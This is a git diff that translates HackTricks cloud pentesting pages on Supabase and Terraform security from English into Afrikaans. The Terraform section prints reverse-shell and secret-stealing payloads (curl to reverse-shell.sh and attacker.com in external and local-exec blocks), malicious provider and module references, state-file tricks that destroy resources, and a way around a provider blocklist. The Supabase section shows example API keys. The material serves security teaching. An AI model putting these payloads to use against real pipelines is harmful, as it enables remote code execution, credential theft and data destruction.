unauthorized operations. 
+Publiek toeganklike funksies of onbeperkte API's kan uitgebuit word vir ongeoorloofde operasies. -#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. -- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. -- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. -- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. +- **Beperk Funksie Toegang:** Gebruik VPC's, sekuriteitsgroepe, en vuurmuur reĂ«ls om toegang tot vertroude bronne te beperk. +- **Implementeer Robuuste Outentisering:** Verseker dat alle blootgestelde eindpunte behoorlike outentisering en magtiging vereis. +- **Gebruik API Gateways Veilig:** Konfigureer API Gateways om sekuriteitsbeleide af te dwing, insluitend invoer validasie en tarief beperking. +- **Deaktiveer Ongebruikte Eindpunte:** Hersien gereeld en deaktiveer enige eindpunte wat nie meer in gebruik is nie. --- -### **Excessive Permissions for Team Members and External Collaborators** +### **Oorvloedige Toestemmings vir Spanlede en Eksterne Samewerkers** -Granting excessive permissions to team members and external collaborators can lead to unauthorized access, data breaches, and misuse of resources. This risk is heightened in environments where multiple individuals have varying levels of access, increasing the attack surface and potential for insider threats. +Die toekenning van oorvloedige toestemmings aan spanlede en eksterne samewerkers kan lei tot ongeoorloofde toegang, datalekke, en misbruik van hulpbronne. Hierdie risiko is verhoog in omgewings waar verskeie individue verskillende vlakke van toegang het, wat die aanval oppervlak en potensiaal vir binnelandse bedreigings verhoog. 
-#### **Mitigation Strategies** +#### **Mitigering StrategieĂ«** -- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. +- **Beginsel van Minste Voorreg:** Verseker dat spanlede en samewerkers slegs die toestemmings het wat nodig is om hul take uit te voer. --- -### **Access Keys and License Keys Security** +### **Toegang Sleutels en Lisensie Sleutels Sekuriteit** -**Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI. +**Toegang Sleutels** en **Lisensie Sleutels** is kritieke akrediteerbare wat gebruik word om interaksies met die Serverless Framework CLI te outentiseer en te magtig. -- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. -- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. +- **Lisensie Sleutels:** Dit is unieke identifiseerders wat benodig word om toegang tot Serverless Framework weergawe 4 te outentiseer wat toelaat om via CLI aan te meld. +- **Toegang Sleutels:** Akrediteerbare wat die Serverless Framework CLI toelaat om met die Serverless Framework Dashboard te outentiseer. Wanneer jy aanmeld met `serverless` cli, sal 'n toegang sleutel **gegenereer en op die skootrekenaar gestoor word**. Jy kan dit ook as 'n omgewing veranderlike genaamd `SERVERLESS_ACCESS_KEY` stel. -#### **Security Risks** +#### **Sekuriteitsrisiko's** -1. **Exposure Through Code Repositories:** - - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. -2. 
**Insecure Storage:** - - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. -3. **Improper Distribution:** - - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. -4. **Lack of Rotation:** - - Not regularly rotating keys extends the exposure period if keys are compromised. -5. **Excessive Permissions:** - - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. +1. **Blootstelling Deur Kode Depositories:** +- Hardcoding of per ongeluk die toekennings sleutels en lisensie sleutels aan die weergawebeheer stelsels kan lei tot ongeoorloofde toegang. +2. **Onveilige Berging:** +- Die berging van sleutels in duidelike teks binne omgewing veranderlikes of konfigurasie lĂȘers sonder behoorlike enkripsie verhoog die waarskynlikheid van lekkasie. +3. **Onvanpaste Verspreiding:** +- Die deel van sleutels deur onveilige kanale (bv. e-pos, klets) kan lei tot onderskepping deur kwaadwillige akteurs. +4. **Gebrek aan Rotasie:** +- Om sleutels nie gereeld te roteer nie, verleng die blootstelling tydperk as sleutels gecompromitteer word. +5. **Oorvloedige Toestemmings:** +- Sleutels met breĂ« toestemmings kan uitgebuit word om ongeoorloofde aksies oor verskeie hulpbronne uit te voer. {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md index 6fa6219f8..65ecfc956 100644 --- a/src/pentesting-ci-cd/supabase-security.md +++ b/src/pentesting-ci-cd/supabase-security.md 
@@ -1,50 +1,49 @@ -# Supabase Security +# Supabase Veiligheid {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings. +Volgens hul [**landing page**](https://supabase.com/): Supabase is 'n oopbron Firebase alternatief. Begin jou projek met 'n Postgres databasis, Verifikasie, onmiddellike API's, Edge Funksies, Realtime intekeninge, Berging, en Vektor inbedings. -### Subdomain +### Subdomein -Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`** +Basies wanneer 'n projek geskep word, sal die gebruiker 'n supabase.co subdomein ontvang soos: **`jnanozjdybtpqgcwhdiz.supabase.co`** -## **Database configuration** +## **Databasis konfigurasie** > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`** +> **Hierdie data kan vanaf 'n skakel soos `https://supabase.com/dashboard/project//settings/database` verkry word** -This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\ -The password is a **password the user put** previously. +Hierdie **databasis** sal in 'n AWS streek ontplooi word, en om daartoe te verbind, sal dit moontlik wees om te verbind met: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (dit is in us-west-1 geskep).\ +Die wagwoord is 'n **wagwoord wat die gebruiker voorheen ingevoer het**. 
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**. +Daarom, aangesien die subdomein 'n bekende een is en dit as gebruikersnaam gebruik word en die AWS streke beperk is, mag dit moontlik wees om te probeer om die **wagwoord te brute force**. -This section also contains options to: +Hierdie afdeling bevat ook opsies om: -- Reset the database password -- Configure connection pooling -- Configure SSL: Reject plan-text connections (by default they are enabled) -- Configure Disk size -- Apply network restrictions and bans +- Die databasis wagwoord te herstel +- Verbinding pooling te konfigureer +- SSL te konfigureer: Weier plan-kleur verbindings (standaard is dit geaktiveer) +- Skyf grootte te konfigureer +- Netwerk beperkings en verbande toe te pas -## API Configuration +## API Konfigurasie > [!TIP] -> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`** +> **Hierdie data kan vanaf 'n skakel soos `https://supabase.com/dashboard/project//settings/api` verkry word** -The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`. +Die URL om toegang tot die supabase API in jou projek te verkry, sal wees: `https://jnanozjdybtpqgcwhdiz.supabase.co`. 
-### anon api keys +### anon api sleutels -It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in +Dit sal ook 'n **anon API sleutel** (`role: "anon"`), soos: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` genereer wat die toepassing sal moet gebruik om met die API sleutel in ons voorbeeld in kontak te tree. -It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be: +Dit is moontlik om die API REST te vind om hierdie API te kontak in die [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), maar die mees interessante eindpunte sal wees:
Signup (/auth/v1/signup) - ``` POST /auth/v1/signup HTTP/2 Host: id.io.net @@ -69,13 +68,11 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-Login (/auth/v1/token?grant_type=password) - +Inlog (/auth/v1/token?grant_type=password) ``` POST /auth/v1/token?grant_type=password HTTP/2 Host: hypzbtgspjkludjcnjxl.supabase.co @@ -100,68 +97,63 @@ Priority: u=1, i {"email":"test@exmaple.com","password":"SomeCOmplexPwd239."} ``` -
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**. +So, wanneer jy 'n kliënt ontdek wat supabase gebruik met die subdomein wat aan hulle toegeken is (dit is moontlik dat 'n subdomein van die maatskappy 'n CNAME oor hul supabase subdomein het), kan jy probeer om **'n nuwe rekening in die platform te skep met die supabase API**. -### secret / service_role api keys +### geheim / diensrol API sleutels -A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**. +'n Geheime API-sleutel sal ook gegenereer word met **`role: "service_role"`**. Hierdie API-sleutel moet geheim wees omdat dit in staat sal wees om **Row Level Security** te omseil. -The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` +Die API-sleutel lyk soos volg: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354` -### JWT Secret +### JWT Geheim -A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**. +'n **JWT Geheim** sal ook gegenereer word sodat die toepassing **aangepaste JWT tokens kan skep en teken**. -## Authentication +## Verifikasie -### Signups +### Teken in > [!TIP] -> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints. 
+> Deur **standaard** sal supabase **nuwe gebruikers toelaat om rekeninge te skep** op jou projek deur die voorheen genoemde API eindpunte te gebruik. -However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\ -This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those: +Ehowever, hierdie nuwe rekeninge, standaard, **sal hul e-posadres moet verifieer** om in die rekening in te log. Dit is moontlik om **"Laat anonieme aanmeldings toe"** in te skakel om mense toe te laat om in te log sonder om hul e-posadres te verifieer. Dit kan toegang tot **onverwagte data** verleen (hulle kry die rolle `public` en `authenticated`).\ +Dit is 'n baie slegte idee omdat supabase per aktiewe gebruiker hef, so mense kan gebruikers skep en inlog en supabase sal vir hulle hef:
-### Passwords & sessions +### Wagwoorde & sessies -It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\ -It's recommended to **improve the requirements as the default ones are weak**. +Dit is moontlik om die minimum wagwoordlengte aan te dui (standaard), vereistes (geen standaard) en om die gebruik van gelekte wagwoorde te verbied.\ +Dit word aanbeveel om die **vereistes te verbeter aangesien die standaard een swak is**. -- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...) -- Bot and Abuse Protection: It's possible to enable Captcha. +- Gebruiker Sessies: Dit is moontlik om te configureer hoe gebruiker sessies werk (tydoue, 1 sessie per gebruiker...) +- Bot en Misbruik Beskerming: Dit is moontlik om Captcha in te skakel. -### SMTP Settings +### SMTP Instellings -It's possible to set an SMTP to send emails. +Dit is moontlik om 'n SMTP in te stel om e-posse te stuur. 
-### Advanced Settings +### Gevorderde Instellings -- Set expire time to access tokens (3600 by default) -- Set to detect and revoke potentially compromised refresh tokens and timeout -- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default) -- Max Direct Database Connections: Max number of connections used to auth (10 by default) -- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default) +- Stel vervaldatum in vir toegangstokens (3600 standaard) +- Stel in om potensieel gecompromitteerde verfris tokens te detecteer en in te trek +- MFA: Dui aan hoeveel MFA faktore op een slag per gebruiker geregistreer kan word (10 standaard) +- Maksimum Direkte Databasis Verbindinge: Maksimum aantal verbindings wat gebruik word om te autentiseer (10 standaard) +- Maksimum Versoek Duur: Maksimum tyd wat toegelaat word vir 'n Auth versoek om te duur (10s standaard) -## Storage +## Berging > [!TIP] -> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets). +> Supabase laat **toe om lĂȘers te stoor** en dit oor 'n URL beskikbaar te stel (dit gebruik S3 emmers). -- Set the upload file size limit (default is 50MB) -- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` -- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) +- Stel die opgelaaide lĂȘergrootte limiet in (standaard is 50MB) +- Die S3 verbinding word gegee met 'n URL soos: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3` +- Dit is moontlik om **S3 toegangssleutel** aan te vra wat gevorm word deur 'n `access key ID` (bv. `a37d96544d82ba90057e0e06131d0a7b`) en 'n `secret access key` (bv. 
`58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`) -## Edge Functions +## Edge Funksies -It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly). +Dit is moontlik om **geheime** in supabase te stoor wat ook **toeganklik sal wees deur edge funksies** (hulle kan van die web geskep en verwyder word, maar dit is nie moontlik om hul waarde direk te benader nie). {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md index 09b875ff2..2f5c733e7 100644 --- a/src/pentesting-ci-cd/terraform-security.md +++ b/src/pentesting-ci-cd/terraform-security.md 
@@ -6,303 +6,273 @@ [From the docs:](https://developer.hashicorp.com/terraform/intro) -HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features. +HashiCorp Terraform is 'n **infrastruktuur as kode hulpmiddel** wat jou toelaat om beide **cloud en op-prem hulpbronne** in menslike leesbare konfigurasie lĂȘers te definieer wat jy kan weergawe, hergebruik en deel. Jy kan dan 'n konsekwente werksvloei gebruik om al jou infrastruktuur deur sy lewensiklus te voorsien en te bestuur. Terraform kan lae-vlak komponente soos rekenaar, stoor en netwerk hulpbronne bestuur, sowel as hoĂ«-vlak komponente soos DNS inskrywings en SaaS funksies. #### How does Terraform work? -Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API. +Terraform skep en bestuur hulpbronne op cloud platforms en ander dienste deur hul toepassingsprogrammeringsinterfaces (API's). Verskaffers stel Terraform in staat om met feitlik enige platform of diens met 'n toeganklike API te werk. ![](<../images/image (177).png>) -HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. 
You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more. +HashiCorp en die Terraform gemeenskap het reeds **meer as 1700 verskaffers** geskryf om duisende verskillende tipes hulpbronne en dienste te bestuur, en hierdie getal hou aan om te groei. Jy kan al die publiek beskikbare verskaffers op die [Terraform Registry](https://registry.terraform.io/) vind, insluitend Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, en nog baie meer. -The core Terraform workflow consists of three stages: +Die kern Terraform werksvloei bestaan uit drie fases: -- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer. -- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration. -- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines. +- **Write:** Jy definieer hulpbronne, wat oor verskeie cloud verskaffers en dienste mag wees. Byvoorbeeld, jy mag 'n konfigurasie skep om 'n toepassing op virtuele masjiene in 'n Virtuele Privaat Cloud (VPC) netwerk met sekuriteitsgroepe en 'n laaibalans te ontplooi. +- **Plan:** Terraform skep 'n uitvoeringsplan wat die infrastruktuur beskryf wat dit sal skep, opdateer of vernietig gebaseer op die bestaande infrastruktuur en jou konfigurasie. 
+- **Apply:** Op goedkeuring, voer Terraform die voorgestelde operasies in die korrekte volgorde uit, terwyl dit enige hulpbron afhanklikhede respekteer. Byvoorbeeld, as jy die eienskappe van 'n VPC opdateer en die aantal virtuele masjiene in daardie VPC verander, sal Terraform die VPC weer skep voordat dit die virtuele masjiene skaal. ![](<../images/image (215).png>) ### Terraform Lab -Just install terraform in your computer. +Installeer eenvoudig terraform op jou rekenaar. -Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads). +Hier het jy 'n [gids](https://learn.hashicorp.com/tutorials/terraform/install-cli) en hier het jy die [beste manier om terraform af te laai](https://www.terraform.io/downloads). ## RCE in Terraform -Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**. +Terraform **het nie 'n platform wat 'n webblad of 'n netwerkdiens blootstel** wat ons kan opnoem nie, daarom is die enigste manier om terraform te kompromitteer om **in staat te wees om terraform konfigurasie lĂȘers by te voeg/wysig**. -However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly. +Egter, terraform is 'n **baie sensitiewe komponent** om te kompromitteer omdat dit **bevoorregte toegang** tot verskillende plekke sal hĂȘ sodat dit behoorlik kan werk. -The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**. 
+Die hoof manier vir 'n aanvaller om in staat te wees om die stelsel waar terraform loop te kompromitteer, is om **die repo te kompromitteer wat terraform konfigurasies stoor**, omdat dit op 'n stadium **geĂŻterpreteer** gaan word. -Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**: +Werklik, daar is oplossings daar buite wat **automaties terraform plan/apply uitvoer nadat 'n PR** geskep is, soos **Atlantis**: {{#ref}} atlantis-security.md {{#endref}} -If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`. +As jy in staat is om 'n terraform lĂȘer te kompromitteer, is daar verskillende maniere waarop jy RCE kan uitvoer wanneer iemand `terraform plan` of `terraform apply` uitvoer. ### Terraform plan -Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`. +Terraform plan is die **mees gebruikte opdrag** in terraform en ontwikkelaars/oplossings wat terraform gebruik, noem dit heeltyd, so die **gemaklikste manier om RCE te kry** is om te verseker dat jy 'n terraform konfigurasie lĂȘer vergiftig wat arbitrĂȘre opdragte in 'n `terraform plan` sal uitvoer. **Using an external provider** -Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`. 
- -Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`: +Terraform bied die [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) wat 'n manier bied om tussen Terraform en eksterne programme te kommunikeer. Jy kan die `external` data bron gebruik om arbitrĂȘre kode tydens 'n `plan` uit te voer. +Om iets soos die volgende in 'n terraform konfigurasie lĂȘer in te voeg, sal 'n rev shell uitvoer wanneer jy `terraform plan` uitvoer: ```javascript data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**Gebruik van 'n pasgemaakte verskaffer** -**Using a custom provider** - -An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)): - +'n Aanvaller kan 'n [pasgemaakte verskaffer](https://learn.hashicorp.com/tutorials/terraform/provider-setup) na die [Terraform Registry](https://registry.terraform.io/) stuur en dit dan by die Terraform-kode in 'n kenmerk tak voeg ([voorbeeld hier](https://alex.kaskaso.li/post/terraform-plan-rce)): ```javascript - terraform { - required_providers { - evil = { - source = "evil/evil" - version = "1.0" - } - } - } +terraform { +required_providers { +evil = { +source = "evil/evil" +version = "1.0" +} +} +} provider "evil" {} ``` +Die verskaffer word afgelaai in die `init` en sal die kwaadwillige kode uitvoer wanneer `plan` uitgevoer word. 
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed +Jy kan 'n voorbeeld vind in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) -You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec) +**Gebruik 'n eksterne verwysing** -**Using an external reference** - -Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +Albei genoemde opsies is nuttig, maar nie baie stil nie (die tweede is stilser, maar meer kompleks as die eerste een). Jy kan hierdie aanval selfs op 'n **stilser manier** uitvoer deur hierdie voorstelle te volg: +- In plaas daarvan om die rev shell direk in die terraform-lĂȘer by te voeg, kan jy **'n eksterne hulpbron laai** wat die rev shell bevat: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` - You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell kode in 'n tak** binne die repo te verberg, iets soos: 
`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` ### Terraform Apply -Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: - +Terraform apply sal uitgevoer word om al die veranderinge toe te pas, jy kan dit ook misbruik om RCE te verkry deur **'n kwaadwillige Terraform-lĂȘer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ +Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lĂȘer eindig: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**. +Volg die **voorstelle van die vorige tegniek** om hierdie aanval op 'n **stealthier manier met eksterne verwysings** uit te voer. 
## Secrets Dumps -You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like: - +Jy kan **geheime waardes wat deur terraform gebruik word, laat dump** deur `terraform apply` te loop deur iets soos die volgende aan die terraform-lĂȘer toe te voeg: ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +## Misbruik van Terraform Toestand LĂȘers -## Abusing Terraform State Files +In die geval dat jy skryfreĂ«ls oor terraform toestand lĂȘers het, maar nie die terraform kode kan verander nie, [**hierdie navorsing**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) bied 'n paar interessante opsies om voordeel te trek uit die lĂȘer: -In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file: +### Verwydering van hulpbronne -### Deleting resources +Daar is 2 maniere om hulpbronne te vernietig: -There are 2 ways to destroy resources: - -1. **Insert a resource with a random name into the state file pointing to the real resource to destroy** - -Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page: +1. **Voeg 'n hulpbron met 'n ewekansige naam by die toestand lĂȘer wat na die werklike hulpbron verwys om te vernietig** +Omdat terraform sal sien dat die hulpbron nie behoort te bestaan nie, sal dit dit vernietig (volgens die werklike hulpbron ID wat aangedui word). 
Voorbeeld van die vorige bladsy: ```json { - "mode": "managed", - "type": "aws_instance", - "name": "example", - "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", - "instances": [ - { - "attributes": { - "id": "i-1234567890abcdefg" - } - } - ] +"mode": "managed", +"type": "aws_instance", +"name": "example", +"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]", +"instances": [ +{ +"attributes": { +"id": "i-1234567890abcdefg" +} +} +] }, ``` +2. **Wysig die hulpbron om te verwyder op 'n manier dat dit nie moontlik is om op te dateer nie (sodat dit verwyder en weer geskep sal word)** -2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)** - -For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it. +Vir 'n EC2-instantie is dit genoeg om die tipe van die instantie te wysig sodat terraform dit verwyder en weer skep. ### RCE -It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research: - +Dit is ook moontlik om [n pasgemaakte verskaffer te skep](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) en net een van die verskaffers in die terraform toestandlĂȘer te vervang met die kwaadwillige een of 'n leĂ« hulpbron met die kwaadwillige verskaffer by te voeg. 
Voorbeeld uit die oorspronklike navorsing: ```json "resources": [ { - "mode": "managed", - "type": "scaffolding_example", - "name": "example", - "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", - "instances": [ +"mode": "managed", +"type": "scaffolding_example", +"name": "example", +"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]", +"instances": [ - ] +] }, ``` +### Vervang geblacklisted verskaffer -### Replace blacklisted provider - -In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well. - +In die geval dat jy 'n situasie teĂ«kom waar `hashicorp/external` geblacklisted was, kan jy die `external` verskaffer herimplementer deur die volgende te doen. Let wel: Ons gebruik 'n fork van die eksterne verskaffer gepubliseer deur https://registry.terraform.io/providers/nazarewk/external/latest. Jy kan jou eie fork of herimplementering ook publiseer. ```terraform terraform { - required_providers { - external = { - source = "nazarewk/external" - version = "3.0.0" - } - } +required_providers { +external = { +source = "nazarewk/external" +version = "3.0.0" +} +} } ``` - -Then you can use `external` as per normal. - +Dan kan jy `external` soos normaal gebruik. 
